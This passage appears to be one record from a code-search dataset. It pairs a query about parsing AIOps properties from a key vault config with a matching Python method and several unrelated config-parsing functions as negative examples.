"0.57241505",
"0.5710994",
"0.570829",
"0.5701255",
"0.5697841",
"0.5676796",
"0.5673732",
"0.56617445",
"0.56183356",
"0.559826",
"0.55637723",
"0.5559803",
"0.55412877"
] |
0.6862361
|
1
|
Abstract method implementation to parse AIOps specific properties stored in the key vault config.
|
def parseProperties(self) -> bool:
# vNetIds is not a mandatory property. This property can be used if the resources are distributed across multiple vNets.
self.vNetIds = self.providerProperties.get("vNetIds", None)
# enabledProviders contains the provider types for which AIOps is enabled. Mandatory property.
self.enabledProviders = self.providerProperties.get(
"enabledProviders", None)
if not self.enabledProviders:
self.tracer.error(
"[%s] enabledProviders cannot be empty in the AIOps config." % self.fullName)
return False
return True
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def parse_config(self):\n # TODO: parse config file\n pass",
"def _parse_config(self, profile: Optional[str]):\n\n # read the values\n def assign_key(key: str):\n if self._config_parser.has_option(section, key):\n if key.lower() == _USE_COLOR.lower():\n self.__dict__[key] = self._config_parser.getboolean(section, key)\n else:\n self.__dict__[key] = self._config_parser.get(section, key)\n\n # get the profile\n section = _DEFAULT\n if profile is None:\n if self._config_parser.has_option(_DEFAULT, _PROFILE):\n section = self._config_parser.get(_DEFAULT, _PROFILE)\n self.profile = section\n else:\n section = profile\n\n assign_key(_ACCESSKEY)\n assign_key(_WORKSPACEID)\n assign_key(_TENANTID)\n assign_key(_URL)\n assign_key(_GATEWAYURL)\n assign_key(_USE_COLOR)\n\n # if url is none set it to default bonsai api url\n if self.url is None:\n self.url = _DEFAULT_URL\n elif not urlparse(self.url).scheme:\n # if no url scheme is supplied, assume https\n self.url = \"https://{}\".format(self.url)",
"def parse_conf(self):\n\n parser = configparser.RawConfigParser()\n parser.read(self.filename)\n\n try:\n self.id_node = parser['CONF_MACHINE']['ID_NODE']\n\n # eliminate possible white spaces between metrics\n temp = parser['CONF_MACHINE']['METRICS'].split(',')\n for itr in temp:\n self.metrics.append(itr.strip())\n\n except Exception:\n raise Exception(\"missing id or metrics\")\n\n try:\n self.interval = parser['CONF_MAHCINE']['INTERVAL']\n except Exception:\n self.interval = 1\n\n try:\n self.ampq_url = parser['ampq']['url']\n self.ampq_port = parser['ampq']['port']\n self.ampq_vhost = parser['ampq']['vhost']\n self.ampq_user = parser['ampq']['user']\n self.ampq_password = parser['ampq']['password']\n except Exception:\n raise Exception(\"missing ampq configs\")",
"def test_parse_config(self):\n config_file = os.path.join('top', 'conf', 'top.conf')\n\n self._c.set_config_file(config_file)\n self._c.parse_config()\n\n received = self._c.adp_loop\n expected = 30\n msg = 'AdpB2CConfig.adp_loop error'\n self.assertEqual(received, expected, msg)\n\n received = self._c.adp_dirs\n expected = ['/var/ftp/pub/nparcel/adp/in']\n msg = 'AdpB2CConfig.adp_dirs error'\n self.assertListEqual(received, expected, msg)\n\n received = self._c.archive_dir\n expected = '/data/top/archive'\n msg = 'AdpB2CConfig.archive_dir error'\n self.assertEqual(received, expected, msg)\n\n received = self._c.adp_file_formats\n expected = []\n msg = 'AdpB2CConfig.adp_file_formats error'\n self.assertListEqual(received, expected, msg)\n\n # For the default configuration file the [db] section is blank\n received = self._c.db_kwargs()\n msg = 'AdpB2CConfig.db_kwargs error'\n self.assertIsNone(received, msg)\n\n received = self._c.code_header\n expected = 'TP Code'\n msg = 'AdpB2CConfig.code_header error'\n self.assertEqual(received, expected, msg)\n\n received = self._c.adp_headers\n expected = {'agent.code': 'TP Code',\n 'agent.dp_code': 'DP Code',\n 'agent.name': 'ADP Name',\n 'agent.address': 'Address',\n 'agent.suburb': 'Suburb',\n 'agent.state': 'State',\n 'agent.postcode': 'Postcode',\n 'agent.opening_hours': 'Opening Hours',\n 'agent.notes': 'Notes',\n 'agent.parcel_size_code': 'ADP Accepts Parcel Size',\n 'agent.phone_nbr': 'Phone',\n 'agent.contact_name': 'Contact',\n 'agent.email': 'Email',\n 'agent.fax_nbr': 'Fax',\n 'agent.latitude': 'Latitude',\n 'agent.longitude': 'Longitude',\n 'agent.status': 'Active',\n 'delivery_partner.id': 'DP Id',\n 'login_account.username': 'Username'}\n msg = 'AdpB2CConfig.adp.headers error'\n self.assertDictEqual(received, expected, msg)\n\n received = self._c.delivery_partners\n expected = ['Nparcel', 'ParcelPoint', 'Toll', 'National Storage']\n msg = 'AdpB2CConfig.adp.delivery_partners error'\n self.assertListEqual(received, expected, msg)\n\n received = self._c.adp_default_passwords\n expected = {'nparcel': 'aaaa',\n 'parcelpoint': 'bbbb',\n 'toll': 'cccc',\n 'national storage': 'dddd'}\n msg = 'AdpB2CConfig.adp_default_passwords error'\n self.assertDictEqual(received, expected, msg)",
"def parse_args(self):\n defaults = {\n 'analytics_api_ip': '127.0.0.1',\n 'analytics_api_port': '8181',\n 'start_time': 'now-10m',\n 'end_time': 'now',\n 'select' : [],\n 'sort': [],\n 'admin_user': 'admin',\n 'admin_password': 'contrail123',\n 'conf_file': '/etc/contrail/contrail-keystone-auth.conf',\n 'is_service_instance': 0\n }\n\n conf_parser = argparse.ArgumentParser(add_help=False)\n conf_parser.add_argument(\"--admin-user\", help=\"Name of admin user\")\n conf_parser.add_argument(\"--admin-password\", help=\"Password of admin user\")\n conf_parser.add_argument(\"--conf-file\", help=\"Configuration file\")\n conf_parser.add_argument(\"--analytics-api-ip\", help=\"IP address of Analytics API Server\")\n conf_parser.add_argument(\"--analytics-api-port\", help=\"Port of Analytcis API Server\")\n args, remaining_argv = conf_parser.parse_known_args();\n\n configfile = defaults['conf_file']\n if args.conf_file:\n configfile = args.conf_file\n\n config = ConfigParser.SafeConfigParser()\n config.read(configfile)\n if 'KEYSTONE' in config.sections():\n if args.admin_user == None:\n args.admin_user = config.get('KEYSTONE', 'admin_user')\n if args.admin_password == None:\n args.admin_password = config.get('KEYSTONE','admin_password')\n\n if args.admin_user == None:\n args.admin_user = defaults['admin_user']\n if args.admin_password == None:\n args.admin_password = defaults['admin_password']\n\n if args.analytics_api_ip == None:\n args.analytics_api_ip = defaults['analytics_api_ip']\n if args.analytics_api_port == None:\n args.analytics_api_port = defaults['analytics_api_port']\n\n parser = argparse.ArgumentParser(\n # Inherit options from config_parser\n parents=[conf_parser],\n # print script description with -h/--help\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.set_defaults(**defaults)\n\n parser.add_argument(\n \"--start-time\", help=\"Logs start time (format now-10m, now-1h)\")\n parser.add_argument(\"--end-time\", help=\"Logs end time\")\n parser.add_argument(\n \"--last\", help=\"Logs from last time period (format 10m, 1d)\")\n parser.add_argument(\n \"--table\", help=\"SessionAPI to query\", required=True,\n choices=['SessionSeriesTable', 'SessionRecordTable'])\n parser.add_argument(\n \"--session-type\", help=\"Session Type\", required=True,\n choices=['client', 'server'])\n parser.add_argument(\n \"--is-service-instance\", help=\"Service Instance Sessions\", type=int)\n parser.add_argument(\n \"--select\", help=\"List of Select Terms\", nargs='+')\n parser.add_argument(\n \"--where\", help=\"List of Where Terms to be ANDed\", nargs='+')\n parser.add_argument(\n \"--filter\", help=\"List of Filter Terms to be ANDed\", nargs='+')\n parser.add_argument(\n \"--sort\", help=\"List of Sort Terms\", nargs='+')\n parser.add_argument(\n \"--limit\", help=\"Limit the number of results\")\n\n self._args = parser.parse_args(remaining_argv)\n\n self._args.admin_user = args.admin_user\n self._args.admin_password = args.admin_password\n self._args.analytics_api_ip = args.analytics_api_ip\n self._args.analytics_api_port = args.analytics_api_port\n\n try:\n self._start_time, self._end_time = \\\n OpServerUtils.parse_start_end_time(\n start_time = self._args.start_time,\n end_time = self._args.end_time,\n last = self._args.last)\n except:\n return -1\n\n return 0",
"def __parsePropertyElement(properties):\n global __all_config\n if properties and len(properties) > 0:\n for prop in properties:\n name = prop.getAttribute(\"name\")\n value = prop.getAttribute(\"value\")\n if name == \"thread-size\":\n if not re.match(r\"[0-9]{1,3}\", value):\n value = \"1\"\n __addProperty(name, value)\n elif name == \"follow\":\n if not re.match(\"true\", value, re.I) and not re.match(\"false\", value, re.I):\n value = \"false\"\n __addProperty(name, value.lower())\n elif name == \"format\":\n value = value.strip()\n __addProperty(name, value)\n elif name == \"connect-timeout\":\n if not re.match(r\"[0-9]+\", value):\n value = \"0\"\n __addProperty(name, value)\n elif name == \"read-timeout\":\n if not re.match(r\"[0-9]+\", value):\n value = \"0\"\n __addProperty(name, value)\n elif name == \"method\":\n if not re.match(\"get\", value, re.I) and not re.match(\"post\", value, re.I):\n value = \"GET\"\n __addProperty(name, value.upper())\n\n #print(__all_config)",
"def __init__(self):\n ConfigParser.RawConfigParser.OPTCRE = re.compile(r'(?P<option>[^=\\s][^=]*)\\s*(?P<vi>[=])\\s*(?P<value>.*)$')\n self.CONFIG = ConfigParser.ConfigParser()\n self.CONFIG.read(os.path.join(os.path.dirname(__file__)))\n self.IPS = []",
"def parse(self, content):\n self._sections = {}\n self._filters = []\n section = None\n\n def error(msg):\n print('autodl.cfg: line {}: {}'.format(i + 1, msg))\n # log('autodl.cfg: line {}: {}'.format(i + 1, msg))\n\n first_prog = re.compile(ur'^\\[\\s*([\\w\\-]+)\\s*(?:([^\\]]+))?\\s*]$')\n second_prog = re.compile(ur'^([\\w\\-]+)\\s*=(.*)$')\n lines = content['data'].split('\\n')\n for line in lines:\n i = 0\n line = line.strip()\n if line == '':\n continue\n\n first_array = first_prog.match(line)\n second_array = second_prog.match(line)\n if line[0] == '#':\n if section:\n section.add_comment(line)\n elif first_array:\n _type = first_array.group(1).strip().lower()\n try:\n _name = first_array.group(2).strip().lower()\n except AttributeError:\n _name = None\n section = self.get_section(_type, _name)\n elif second_array:\n if section is None:\n error('Missing a [section]')\n else:\n _option = second_array.group(1).strip().lower()\n _value = second_array.group(2).strip().lower()\n section.add_option(_option, _value)\n else:\n error('Ignoring line')\n i += 1",
"def read_config(self):\n cfg = read_conf(self.CONF_FILE)\n self.api_key = cfg[\"ALERT_API_KEY\"]\n self.title = cfg[\"APP_NAME\"]\n if type(cfg[\"alertes\"]) is dict:\n self.alertes = cfg[\"alertes\"]\n else:\n self.alertes = dict()",
"def get_data_config(self):\n conf_map = {}\n\n if self.alien_alg.currentIndex() == 1:\n conf_map['alien_alg'] = '\"block_aliens\"'\n if len(self.aliens.text()) > 0:\n conf_map['aliens'] = str(self.aliens.text()).replace('\\n', '')\n if self.alien_alg.currentIndex() == 2:\n conf_map['alien_alg'] = '\"alien_file\"'\n if len(self.alien_file.text()) > 0:\n conf_map['alien_file'] = '\"' + str(self.alien_file.text()) + '\"'\n elif self.alien_alg.currentIndex() == 3:\n conf_map['alien_alg'] = '\"AutoAlien1\"'\n if len(self.AA1_size_threshold.text()) > 0:\n conf_map['AA1_size_threshold'] = str(self.AA1_size_threshold.text())\n if len(self.AA1_asym_threshold.text()) > 0:\n conf_map['AA1_asym_threshold'] = str(self.AA1_asym_threshold.text())\n if len(self.AA1_min_pts.text()) > 0:\n conf_map['AA1_min_pts'] = str(self.AA1_min_pts.text())\n if len(self.AA1_eps.text()) > 0:\n conf_map['AA1_eps'] = str(self.AA1_eps.text())\n if len(self.AA1_amp_threshold.text()) > 0:\n conf_map['AA1_amp_threshold'] = str(self.AA1_amp_threshold.text())\n if self.AA1_save_arrs.isChecked():\n conf_map['AA1_save_arrs'] = \"True\"\n if len(self.AA1_expandcleanedsigma.text()) > 0:\n conf_map['AA1_expandcleanedsigma'] = str(self.AA1_expandcleanedsigma.text())\n\n if len(self.amp_intensity.text()) > 0:\n conf_map['amp_threshold'] = str(self.amp_intensity.text())\n if len(self.binning.text()) > 0:\n conf_map['binning'] = str(self.binning.text()).replace('\\n', '')\n if len(self.center_shift.text()) > 0:\n conf_map['center_shift'] = str(self.center_shift.text()).replace('\\n', '')\n if len(self.adjust_dimensions.text()) > 0:\n conf_map['adjust_dimensions'] = str(self.adjust_dimensions.text()).replace('\\n', '')\n\n return conf_map",
"def read_settings(self):\n config = ConfigParser.ConfigParser()\n config_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'digital_ocean.ini')\n config.read(config_path)\n\n # Credentials\n if config.has_option('digital_ocean', 'api_token'):\n self.api_token = config.get('digital_ocean', 'api_token')\n\n # Cache related\n if config.has_option('digital_ocean', 'cache_path'):\n self.cache_path = config.get('digital_ocean', 'cache_path')\n if config.has_option('digital_ocean', 'cache_max_age'):\n self.cache_max_age = config.getint('digital_ocean', 'cache_max_age')\n\n # Private IP Address\n if config.has_option('digital_ocean', 'use_private_network'):\n self.use_private_network = config.getboolean('digital_ocean', 'use_private_network')\n\n # Group variables\n if config.has_option('digital_ocean', 'group_variables'):\n self.group_variables = ast.literal_eval(config.get('digital_ocean', 'group_variables'))",
"def _extract_settings(config):\n # Some helper functions to get typed fields with good error reporting\n def get(key):\n value = getattr(config, key, None)\n if value is None:\n raise Error(\"Required 'Akara' configuration %r is missing\" % (key,))\n return value\n \n def getstring(key):\n value = get(key)\n if not isinstance(value, basestring):\n raise Error(\"'Akara' configuration %r must be a string, not %r\" %\n (key, value))\n return value\n\n def getint(key):\n value = get(key)\n try:\n return int(value)\n except ValueError:\n raise Error(\"'Akara' configuration %r must be an integer, not %r\" % \n (key, value))\n \n def getpositive(key):\n value = get(key)\n if value <= 0:\n raise Error(\n \"'Akara' configuration %r must be a positive integer, not %r\" %\n (key, value))\n return value\n\n def getnonnegative(key):\n value = getint(key)\n if value <= 0:\n raise Error(\n \"'Akara' configuration %r must be a non-negative integer, not %r\" %\n (key, value))\n return value\n\n\n settings = {}\n\n # The value for 'Listen' can be:\n # <port> as in 8080\n # -or-\n # <host>:<port> as in \"localhost:8081\"\n addr = get('Listen')\n if isinstance(addr, int):\n host, port = (\"\", addr)\n else:\n if ':' in addr:\n host, port_s = addr.rsplit(':', 1)\n else:\n host, port_s = '', addr\n try:\n port = int(port_s)\n if port <= 0:\n raise ValueError\n except ValueError:\n raise Error(\"Listen port must be a positive integer, not %r\" % port_s)\n\n settings[\"server_address\"] = (host, port)\n\n # Used to contract the full OpenSearch template to a given service.\n # If not present, use the Listen host and port.\n # (And if the host isn't present, use 'localhost'. It's not a good\n # default but I'm not going to do a FQDN lookup here since that has\n # side effects. 
Basically, if you need the name right, then set it.)\n try:\n server_root = getstring('ServerRoot')\n except Error:\n if port == 80:\n fmt = \"http://%(host)s/\"\n else:\n fmt = \"http://%(host)s:%(port)s/\"\n server_root = fmt % dict(host = (host or \"localhost\"), port = port)\n \n # Uses only when an Akara service wants to call another Akara service.\n # Needed for the (rare) cases when the listen server has a different\n # local name than the published server.\n try:\n internal_server_root = getstring('InternalServerRoot')\n except Error:\n internal_server_root = server_root\n \n settings[\"server_root\"] = server_root\n settings[\"internal_server_root\"] = internal_server_root\n\n config_root = getstring('ConfigRoot')\n config_root = os.path.expanduser(config_root)\n settings[\"config_root\"] = os.path.abspath(config_root)\n\n pid_file = getstring('PidFile')\n settings[\"pid_file\"] = os.path.join(config_root, pid_file)\n\n error_log = getstring('ErrorLog')\n settings[\"error_log\"] = os.path.join(config_root, error_log)\n\n access_log = getstring('AccessLog')\n settings[\"access_log\"] = os.path.join(config_root, access_log)\n\n module_dir = getstring(\"ModuleDir\")\n settings[\"module_dir\"] = os.path.join(config_root, module_dir)\n \n module_cache = getstring(\"ModuleCache\")\n settings[\"module_cache\"] = os.path.join(config_root, module_cache)\n\n log_level_orig = getstring('LogLevel')\n log_level_s = log_level_orig.upper()\n if log_level_s in _valid_log_levels:\n log_level = _valid_log_levels[log_level_s]\n else:\n raise Error(\n \"global setting 'LogLevel' is %r but must be one of: %s\" %\n (log_level_s, \", \".join(map(repr, _valid_log_levels))))\n \n settings[\"log_level\"] = log_level\n\n\n\n settings[\"max_servers\"] = getpositive(\"MaxServers\")\n settings[\"min_spare_servers\"] = getnonnegative(\"MinSpareServers\")\n settings[\"max_spare_servers\"] = getnonnegative(\"MaxSpareServers\")\n if settings[\"max_spare_servers\"] < settings[\"min_spare_servers\"]:\n raise Error(\"MaxSpareServers (%r) must be greater than MinSpareServers (%r)\" %\n (settings[\"max_spare_servers\"], settings[\"min_spare_servers\"]))\n settings[\"max_requests_per_server\"] = getpositive(\"MaxRequestsPerServer\")\n\n return settings",
"def _parse_config(self, config=None):\r\n # TODO: Load user configuration from the file\r\n # self._current_user_name = get_from_conf(\r\n # config, \"user_name\", self._current_user_name\r\n # )\r\n pass",
"def __init__(self):\n self.inventory = {}\n self.mac_map = {}\n\n for conffile in CONF.config_file:\n # parse each config file\n sections = {}\n parser = cfg.ConfigParser(conffile, sections)\n try:\n parser.parse()\n except IOError as e:\n LOG.error(str(e))\n\n # filter out sections that begin with the driver's tag\n hosts = {k: v for k, v in sections.items()\n if k.startswith(c.DRIVER_TAG)}\n\n # munge the oslo_config data removing the device tag and\n # turning lists with single item strings into strings\n for host in hosts:\n dev_id = host.partition(c.DRIVER_TAG)[2]\n dev_cfg = {k: v[0] for k, v in hosts[host].items()}\n for b in c.BOOLEANS:\n if b in dev_cfg:\n dev_cfg[b] = types.Boolean()(dev_cfg[b])\n self.inventory[dev_id] = dev_cfg\n # If mac is defined add it to the mac_map\n if 'mac' in dev_cfg:\n self.mac_map[dev_cfg['mac'].upper()] = dev_id\n\n LOG.info('Ansible Host List: %s', ', '.join(self.inventory))",
"def _parse(self, content):\n result = TincConfParser.conf_file.parseString(to_unicode(content))\n for entry in result.get(\"entries\", []):\n self[entry[0]] = entry[1]\n keys = result.get(\"keys\", [])\n if keys:\n if len(keys) > 1:\n raise ParserError(\"Hostfile specifies more than one public key!\")\n self.rsa_public_key = '\\n'.join(keys[0])\n old_keys = result.get(\"old_keys\", [])\n for old_key in old_keys:\n self.old_public_keys.append('\\n'.join(old_key))",
"def _parse_config(self):\n with open(self.config_file, 'r') as j:\n config_dict = json.loads(j.read())\n # if attribute is already defined as None in class instances dict, update it.\n for k, v in config_dict.items():\n if k in self.__dict__.keys():\n if self.__dict__[k] is None:\n setattr(self, k, v)",
"def paargs(self):\n paopt_find = {'Night':self.night, 'Telescope':self.telescope, 'Field':self.field, 'RA':self.ra,\n 'DEC':self.dec, 'TimeBeforeDiscovery': self.t_before, 'TimeAfterDiscovery': self.t_after,\n 'Program':self.program, 'datadir':self.datadir, 'outdir':self.outdir}\n paopt_coadd = {'outdir':self.outdir}\n paopt_extract = {'outdir':self.outdir}\n paopt_subimage = {'Program':self.program, 'Telescope':self.telescope, 'RA':self.ra, 'DEC':self.dec,\n 'PixelRadius':self.pixrad, 'tempdir':self.tempdir, 'outdir':self.outdir}\n paopt_imdiff = {'outdir':self.outdir}\n paopt_refstars = {'RA':self.ra, 'DEC':self.dec, 'outdir':self.outdir}\n paopt_phot = {'outdir':self.outdir, 'dumpfile':self.dump_pa('Photometry')}\n\n paopts={}\n defList={'Find_Data' : paopt_find,\n 'Coaddition' : paopt_coadd,\n 'Source_Extraction' : paopt_extract,\n 'Make_Subimages' : paopt_subimage,\n 'Image_Differencing' : paopt_imdiff,\n 'Choose_Refstars' : paopt_refstars,\n 'Photometry' : paopt_phot}\n\n def getPAConfigFromFile(PA,algs):\n def mergeDicts(source,dest):\n for k in source:\n if k not in dest:\n dest[k]=source[k]\n userconfig={}\n if PA in algs:\n fc=algs[PA]\n for k in fc: #do a deep copy leave QA config out\n if k != \"QA\":\n userconfig[k]=fc[k]\n defconfig={}\n if PA in defList:\n defconfig=defList[PA]\n mergeDicts(defconfig,userconfig)\n return userconfig\n\n for PA in self.palist:\n paopts[PA]=getPAConfigFromFile(PA,self.algorithms)\n\n\n return paopts",
"def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)",
"def getACSParams(self):\n params = {}\n params[\"dnsNamePrefix\"] = self.value(self.get('ACS', 'dnsPrefix'))\n params[\"orchestratorType\"] = self.value(self.get('ACS', 'orchestratorType'))\n params[\"agentCount\"] = self.value(self.getint('ACS', 'agentCount'))\n params[\"agentVMSize\"] = self.value(self.get('ACS', 'agentVMSize'))\n params[\"masterCount\"] = self.value(self.getint('ACS', 'masterCount'))\n params[\"linuxAdminUsername\"] = self.value(self.get('ACS', 'username'))\n params[\"sshRSAPublicKey\"] = self.value(self.get('SSH', 'publickey'))\n \n return params",
"def parse_main(self):\n try:\n self.common_config[\"debug\"] = self.config.get('main', 'debug')\n except ConfigParser.NoOptionError:\n self.common_config[\"debug\"] = \"FALSE\"\n \n try:\n conf_local_ip = self.config.get('main', 'local_ip')\n if is_valid_ipv4_address(conf_local_ip):\n self.common_config[\"local_ip\"] = conf_local_ip\n \n elif conf_local_ip == \"default\": #if loca_if == \"default\" try to reach google.com\n try:\n self.common_config[\"local_ip\"] = get_ip_address()\n except Exception, e:\n self.logger.configError(\"cannot discover local ip address: %s\" % e)\n sys.exit(1)\n\n else: #network interface name\n try:\n self.common_config[\"local_ip\"] = get_ip_address_ifname(conf_local_ip)\n except Exception, e:\n self.logger.configError(\"cannot determine ip address of %s interface: %s\" % (conf_local_ip, e))\n sys.exit(1)\n\n except ConfigParser.NoOptionError: \n self.logger.configError(\"Missing mandatory parameters in config file, bailing out!\")\n sys.exit(1)\n\n try:\n log_file = self.common_config[\"log_file\"] = self.config.get('main', 'log_file') \n if log_file.startswith(\"syslog\"):\n try:\n syslog_host = log_file.split(\":\")[1]\n except IndexError:\n syslog_host = 'localhost'\n try:\n syslog_port = int(log_file.split(\":\")[2])\n except IndexError:\n syslog_port = 514\n try:\n syslog_facility = log_file.split(\":\")[3]\n except IndexError:\n syslog_facility = logging.handlers.SysLogHandler.LOG_USER\n self.logger.debugMessage(\"Logging to syslog (host: %s, port: %s, facility: %s)\" % ((syslog_host, syslog_port, syslog_facility)))\n self.common_config[\"conf_log_handler\"] = logging.handlers.SysLogHandler((syslog_host, syslog_port), syslog_facility)\n else:\n self.logger.debugMessage(\"Logging to file: %s\" % log_file)\n try:\n self.common_config[\"conf_log_handler\"] = logging.FileHandler(log_file)\n except IOError, e:\n self.logger.configError(\"cannot access to the log file: %s\" % e)\n sys.exit(1)\n \n except ConfigParser.NoOptionError: \n # no log defined in config file\n self.common_config[\"conf_log_handler\"] = None\n \n try:\n self.common_config[\"daemon\"] = self.config.get('main', 'daemon')\n except ConfigParser.NoOptionError:\n self.common_config[\"daemon\"] = None\n try:\n self.common_config[\"pid_file\"] = self.config.get('main', 'pid_file')\n except ConfigParser.NoOptionError:\n self.common_config[\"pid_file\"] = None\n\n \n return self.common_config",
"def __initConfiguration(self):\n conf = configparser.ConfigParser()\n with open(self.configFile, \"r\") as f:\n conf.readfp(f)\n self.orgConf = conf\n # check additionalSection\n adSection = self.additionalSection\n if adSection in conf:\n adSection = conf[adSection]\n self.conf = {}\n for i in [self.CLIENT_ID, self.CLIENT_SECRET, self.AUTHZ_ENDPOINT,\n self.TOKEN_ENDPOINT, self.REDIRECT_URI, self.SCOPE]:\n if adSection != None and i in adSection:\n self.conf[i] = adSection[i]\n else:\n self.conf[i] = conf[\"DEFAULT\"][i]",
"def getParams(self):\n self.logger.info(\"Getting All Params from config file.\")\n self.params = {}\n for interface in self.config.get('agent', 'interfaces'):\n params = self.params.setdefault(interface, {})\n for item in [['intf_reserve', 1000], ['intf_max', 10000], ['l3enabled', True]]:\n if self.config.has_option(interface, item[0]):\n params[item[0]] = self.config.get(interface, item[0])\n else:\n params[item[0]] = item[1]\n # Take out reserved from intf_max\n self.params[interface]['intf_max'] -= self.params[interface]['intf_reserve']",
"def read_properties(self, inputfile):\n raise NotImplementedError(\n \"Reading from this file format is not yet implemented\")",
"def parse_inifile(self):\n parsed_info = {\n \"identity_type\": None,\n \"username\": None,\n \"api_key\": None,\n \"region\": None,\n }\n res = self.configparse.read(self.inifile)\n for field in parsed_info.keys():\n try:\n parsed_info[field] = self.configparse[\"rackspace_cloud\"][field]\n except KeyError:\n parsed_info[field] = None\n pass\n return LoginInfo(\n identity_type=parsed_info[\"identity_type\"],\n username=parsed_info[\"username\"],\n api_key=parsed_info[\"api_key\"],\n region=parsed_info[\"region\"],\n )",
"def __init__(self, config):\n self.config = self.default_config()\n for key in config:\n if config[key].endswith('*'):\n config[key] = config[key][:-1]\n self.config[key] = re.split('\\s*->\\s*', config[key])",
"def parse_attributes(self):\n attrs = {}\n error = False\n for header, attr in self.app.config['SSO_ATTRIBUTE_MAP'].items():\n required, name = attr\n value = request.environ.get(header, None)\n\n attrs[name] = value\n if not value or value == '':\n if required:\n error = True\n return attrs, error",
"def _configure():\n from AthenaCommon import CfgMgr\n from AthenaCommon.AppMgr import theApp\n from AthenaCommon.AppMgr import ServiceMgr as svcMgr\n from AthenaCommon.Logging import logging\n from AthenaCommon.AthenaCommonFlags import athenaCommonFlags\n from AthenaCommon.Constants import ERROR\n\n\n msg = logging.getLogger( 'ReadAthenaxAODHybrid' )\n msg.debug(\"Configuring Athena for reading xAOD files (via TEvent, with POOL for Metadata)...\")\n\n \n #check if we already have a selector set up\n if hasattr(svcMgr, 'EventSelector'):\n err = \"svcMgr already configured with another EventSelector: [%s]\"%\\\n svcMgr.EventSelector.getFullJobOptName()\n msg.error( err )\n raise RuntimeError( err )\n\n \n \n #Setup our EventSelector\n svcMgr += CfgMgr.Athena__xAODEventSelector( \"EventSelector\" )\n \n #for historical reasons, we now add configurables of a bunch of services\n if not hasattr(svcMgr, 'THistSvc'): svcMgr += CfgMgr.THistSvc()\n if not hasattr (svcMgr, 'ProxyProviderSvc'): svcMgr += CfgMgr.ProxyProviderSvc()\n if not hasattr (svcMgr, 'InputMetaDataStore'): svcMgr += CfgMgr.StoreGateSvc(\"InputMetaDataStore\")\n if not hasattr (svcMgr, 'Athena::xAODCnvSvc'): svcMgr += CfgMgr.Athena__xAODCnvSvc()\n if not hasattr(svcMgr, 'EventPersistencySvc'): svcMgr += CfgMgr.EvtPersistencySvc( \"EventPersistencySvc\" )\n if not hasattr (svcMgr, 'MetaDataSvc'): svcMgr += CfgMgr.MetaDataSvc (\"MetaDataSvc\")\n if not hasattr(svcMgr, 'PoolSvc'): svcMgr += CfgMgr.PoolSvc()\n\n #Here we set various properties of things \n theApp.ExtSvc += [ svcMgr.EventSelector.getFullName() ]\n theApp.EvtSel = \"EventSelector\"\n svcMgr.MetaDataSvc.MetaDataContainer = \"MetaDataHdr\" #this really should be the default for this property :-(\n svcMgr.PoolSvc.OutputLevel = ERROR\n svcMgr.EventSelector.ReadMetaDataWithPool=True\n #default the input collections to the FilesInput from AthenaCommonFlags\n #this is so that the eventselector picks up input files in grid jobs\n svcMgr.EventSelector.InputCollections = athenaCommonFlags.FilesInput() \n \n\n # suppress the event loop heartbeat as it is somewhat I/O hungry for\n # no real gain in n-tuple reading/writing scenarii\n if not hasattr(svcMgr, theApp.EventLoop): svcMgr += getattr(CfgMgr, theApp.EventLoop)()\n evtloop = getattr(svcMgr, theApp.EventLoop)\n try:\n evtloop.EventPrintoutInterval = 10000\n except Exception as err:\n msg.info('disabling event loop heartbeat... [failed]')\n msg.info('performances might be sub-par... sorry.')\n pass\n\n\n msg.debug(\"Configuring Athena for reading ROOT files (via TEvent, with POOL for Metadata)... [OK]\")\n return",
